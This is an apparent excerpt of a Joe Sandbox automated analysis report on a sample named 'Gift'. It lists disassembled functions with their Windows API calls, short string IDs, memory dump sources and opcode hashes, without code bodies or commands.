                                                                          • Instruction ID: 5e9a038dec0d219e8e7489b61d520879b1e23a7ae4d2095f110f61c4e94200b2
                                                                          • Opcode Fuzzy Hash: efc7acc51c8a4f2d7b7cd8698389b9ff3022d05db3621b551df0ab5713daecc4
                                                                          • Instruction Fuzzy Hash: 61E04F36601221ABD7665FF16D0EB573B6CAF50792F118818E245C9090E6B49444C754
                                                                          Function 00310679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00310679
                                                                          • GetDC.USER32(00000000), ref: 00310683
                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003106A3
                                                                          • ReleaseDC.USER32(?), ref: 003106C4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: 6761e8f94f2387b217b262d6da756635fa4a528a719e761713e439f39a23f27a
                                                                          • Instruction ID: 96ee1f26ed3b043224b62be05c478efc62acc05b429ef7bfd7aaf1942124f56d
                                                                          • Opcode Fuzzy Hash: 6761e8f94f2387b217b262d6da756635fa4a528a719e761713e439f39a23f27a
                                                                          • Instruction Fuzzy Hash: B2E01A71800204EFCB069F60D809A9E7BF9EB8C310F11C006F85AA7350DBF885A19F54
                                                                          Function 0031068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 0031068D
                                                                          • GetDC.USER32(00000000), ref: 00310697
                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003106A3
                                                                          • ReleaseDC.USER32(?), ref: 003106C4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: ffe24f4c63c9066dc39dbe68a5e01a766d89f3656b040003295afb670fcaf944
                                                                          • Instruction ID: 7e84d44abdc329af102cd6497532b9e535d62c17cda28191e90a16fcc5471351
                                                                          • Opcode Fuzzy Hash: ffe24f4c63c9066dc39dbe68a5e01a766d89f3656b040003295afb670fcaf944
                                                                          • Instruction Fuzzy Hash: 78E01A71800204AFCB069F60D80965E7BF9EB8C310F10C005F959A7350DBB895518F50
                                                                          Function 0033B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E436A: _wcscpy.LIBCMT ref: 002E438D
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • __wcsnicmp.LIBCMT ref: 0033B670
                                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0033B739
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                          • String ID: LPT
                                                                          • API String ID: 3222508074-1350329615
                                                                          • Opcode ID: 98c4510a0c417a674d0b877b84274512a84ccdcd5ce9b3c875af7642046703de
                                                                          • Instruction ID: d320786fdc30837f782b1c881f457a50d1232ef765330b00e077a4c1ebc0ca26
                                                                          • Opcode Fuzzy Hash: 98c4510a0c417a674d0b877b84274512a84ccdcd5ce9b3c875af7642046703de
                                                                          • Instruction Fuzzy Hash: F3616175A10219EFCB15EF54C895EAEF7B9EF48310F11805AFA46AB391D770AE40CB90
                                                                          Function 00317190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: #V.
                                                                          • API String ID: 4104443479-4118664886
                                                                          • Opcode ID: 70357fc346a33c92f172ec596bdd715ac294f05524626cfc98d91d41265d2580
                                                                          • Instruction ID: 88f190a50f1431c1e19c969ed2d828501230e3e88a9436ef14969ba4205dd84b
                                                                          • Opcode Fuzzy Hash: 70357fc346a33c92f172ec596bdd715ac294f05524626cfc98d91d41265d2580
                                                                          • Instruction Fuzzy Hash: EF516170D10609DFCF2ACFA8C890AEEB7B5FF44304F154529E85AD7250E731A996CB51
                                                                          Function 002DE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 002DE01E
                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 002DE037
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemorySleepStatus
                                                                          • String ID: @
                                                                          • API String ID: 2783356886-2766056989
                                                                          • Opcode ID: c4517981f676935068cd6eb5a381f8fac4f1f19f4d3c34d2199c1f38acd6c3b5
                                                                          • Instruction ID: 8a4a49f7da75f6fc895e1f766ae8d3d2aa5c2094ed0b884383762466d860d138
                                                                          • Opcode Fuzzy Hash: c4517981f676935068cd6eb5a381f8fac4f1f19f4d3c34d2199c1f38acd6c3b5
                                                                          • Instruction Fuzzy Hash: 1D5158714187449BE321AF54E886BABBBF8FB84314F51884EF1D8412A1DB709978CB26
                                                                          Function 00358096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00358186
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0035819B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: '
                                                                          • API String ID: 3850602802-1997036262
                                                                          • Opcode ID: 9454e4a6d8842bb70150aaea6b6c14bae713daf273f2b100ce6239fd7c246482
                                                                          • Instruction ID: d7067c0b70b39266500bdced947a1911cb8500bbfd7cc0dec66b771846e13bb3
                                                                          • Opcode Fuzzy Hash: 9454e4a6d8842bb70150aaea6b6c14bae713daf273f2b100ce6239fd7c246482
                                                                          • Instruction Fuzzy Hash: 54412A74A016099FDB15CF68C881FDA7BB9FB08301F10006AED04EB391DB71AA56CF90
                                                                          Function 00342C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00342C6A
                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00342CA0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CrackInternet_memset
                                                                          • String ID: |
                                                                          • API String ID: 1413715105-2343686810
                                                                          • Opcode ID: 7bbe43c6bd7b017163762c61358ed32aec115c556cb6bcade4d9cc7e16bd5666
                                                                          • Instruction ID: 6bcc21475647566a2b8888f2a41d1096fc6ddb4a91685b502dc281b5dbb7489a
                                                                          • Opcode Fuzzy Hash: 7bbe43c6bd7b017163762c61358ed32aec115c556cb6bcade4d9cc7e16bd5666
                                                                          • Instruction Fuzzy Hash: 1E313B71C10119ABCF01EFA1CC85AEEBFB9FF09340F500069F925AA162DB315966DFA0
                                                                          Function 00357088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 0035713C
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00357178
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$DestroyMove
                                                                          • String ID: static
                                                                          • API String ID: 2139405536-2160076837
                                                                          • Opcode ID: c2a8bd7072d48cb122cd1dc21a7779d9a9b1c32bb01bb67d41284c81717a8d21
                                                                          • Instruction ID: d35194615f8079fbae98ddbb61b787ea647af1fef92bfa527a1a7a86829a94d3
                                                                          • Opcode Fuzzy Hash: c2a8bd7072d48cb122cd1dc21a7779d9a9b1c32bb01bb67d41284c81717a8d21
                                                                          • Instruction Fuzzy Hash: 1C31BE71100604AEDB169F78DC81EFB73ADFF48720F009619FD95871A0DA31AC95CB60
                                                                          Function 00333049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003330B8
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003330F3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu_memset
                                                                          • String ID: 0
                                                                          • API String ID: 2223754486-4108050209
                                                                          • Opcode ID: 8b292cce8fb7dfa4603beb86ec1687c71d4fe7cf926ec830bfc669d185eb6dbd
                                                                          • Instruction ID: dc2d68d0ee3968c2736701015690971437f70c7ed8babdefdf771dcf350b5256
                                                                          • Opcode Fuzzy Hash: 8b292cce8fb7dfa4603beb86ec1687c71d4fe7cf926ec830bfc669d185eb6dbd
                                                                          • Instruction Fuzzy Hash: 4731B931E04209DBEB26AF54C8C5BAEBBB9EF05350F15C019E985A61A1D7709B84CB51
                                                                          Function 003440B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __snwprintf.LIBCMT ref: 00344132
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __snwprintf_memmove
                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                          • API String ID: 3506404897-2584243854
                                                                          • Opcode ID: bd8242ca88d3f12686d4bfe6989da0b754519f5bf69548af42ce171aafe2085a
                                                                          • Instruction ID: 35de761c9dc69e6275e55f63fde6784e8cd8739982de02e87ff5b98cefee69f4
                                                                          • Opcode Fuzzy Hash: bd8242ca88d3f12686d4bfe6989da0b754519f5bf69548af42ce171aafe2085a
                                                                          • Instruction Fuzzy Hash: F1219530A5021DABCF11EF65C892FEE77B9EF54340F4004A5F905AB242DB30E965CBA1
                                                                          Function 00356CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00356D86
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00356D91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Combobox
                                                                          • API String ID: 3850602802-2096851135
                                                                          • Opcode ID: 0b443db1b100e5bbd0f3c7ee553061621a61135a8d46f1b690f629c3f6d5a732
                                                                          • Instruction ID: e589e229decd0fb063cf581e06d2d02ee6aafc5833d6f1710fcfd01464339ec8
                                                                          • Opcode Fuzzy Hash: 0b443db1b100e5bbd0f3c7ee553061621a61135a8d46f1b690f629c3f6d5a732
                                                                          • Instruction Fuzzy Hash: E611B271310208AFEF129E54DC82EFB3BBEEB843A5F514525FD189B2A0D671DC5487A0
                                                                          Function 0035722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002D214F
                                                                            • Part of subcall function 002D2111: GetStockObject.GDI32(00000011), ref: 002D2163
                                                                            • Part of subcall function 002D2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002D216D
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00357296
                                                                          • GetSysColor.USER32(00000012), ref: 003572B0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                          • String ID: static
                                                                          • API String ID: 1983116058-2160076837
                                                                          • Opcode ID: df26be2c8ce89c2dbe39151d836bdfae0b278e2ffe3aa7e497aa58eb1409bb4a
                                                                          • Instruction ID: f981621fcf336d7270dacdd2bf25c25ed495b2c304402b2c503023109bd5681d
                                                                          • Opcode Fuzzy Hash: df26be2c8ce89c2dbe39151d836bdfae0b278e2ffe3aa7e497aa58eb1409bb4a
                                                                          • Instruction Fuzzy Hash: 7A21893261420AAFDB05DFB8DC46EFA7BA8EB08300F004918FD55D3250D771E850DB50
                                                                          Function 00356F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00356FC7
                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00356FD6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LengthMessageSendTextWindow
                                                                          • String ID: edit
                                                                          • API String ID: 2978978980-2167791130
                                                                          • Opcode ID: 725d2e2771556a4bd7a0a3c4dfb4f1d5f2efe09db17e4100cb21ecc858b145cf
                                                                          • Instruction ID: 31afb72dcaa2c9c0dbe9acf4411117e673d778f92f55964e515bf0c099097bee
                                                                          • Opcode Fuzzy Hash: 725d2e2771556a4bd7a0a3c4dfb4f1d5f2efe09db17e4100cb21ecc858b145cf
                                                                          • Instruction Fuzzy Hash: D3119D71900208ABEB124E64EC86EEB3B6DEB04369F914714FD24931E0C771DC589B60
                                                                          Function 00333156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003331C9
                                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003331E8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu_memset
                                                                          • String ID: 0
                                                                          • API String ID: 2223754486-4108050209
                                                                          • Opcode ID: c3b7f67096f93024c34232db318b647dc83bc2bd138b788f21dd274ea15044ee
                                                                          • Instruction ID: 146c6b80a52bdc75ccaec67ecb2e8363a017b11f95eb699763550811ca125878
                                                                          • Opcode Fuzzy Hash: c3b7f67096f93024c34232db318b647dc83bc2bd138b788f21dd274ea15044ee
                                                                          • Instruction Fuzzy Hash: 1E110831D14114ABDB23FB98DC85B9D77BCAB05710F158322E815A72A1D770EF05CB91
                                                                          Function 002D34E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteObject.GDI32(?), ref: 002D351D
                                                                          • DestroyWindow.USER32(?,?,002E4E61), ref: 002D3576
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyObjectWindow
                                                                          • String ID: h6
                                                                          • API String ID: 2587070983-2818403674
                                                                          • Opcode ID: edef61b5dcae48af05972279297b49180bab181683a5a5edd72026da1707ff38
                                                                          • Instruction ID: bc7ed1c0b9c71ed110049023c733878faee59466ab86d1a9bea71fa6bfbc770f
                                                                          • Opcode Fuzzy Hash: edef61b5dcae48af05972279297b49180bab181683a5a5edd72026da1707ff38
                                                                          • Instruction Fuzzy Hash: E521DB7463D2118FCB1ADF19E859A3933E9AB48311F54416BE8068B7E4CB72DE60CF52
                                                                          Function 003428A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003428F8
                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00342921
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$OpenOption
                                                                          • String ID: <local>
                                                                          • API String ID: 942729171-4266983199
                                                                          • Opcode ID: ffd8d8a229e33a3f28153f2fa372f3425c5fdaea8a0e216ef024e7c94246086a
                                                                          • Instruction ID: b29ccec33379ce40e911d1c222a548ccca600a9fd53f8d6841725f15241c3729
                                                                          • Opcode Fuzzy Hash: ffd8d8a229e33a3f28153f2fa372f3425c5fdaea8a0e216ef024e7c94246086a
                                                                          • Instruction Fuzzy Hash: 5D11E070501226BAEB2A8F518C89EFBFBECFF05350F51812AF505AA000E3B07890D6F0
                                                                          Function 0033D116 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
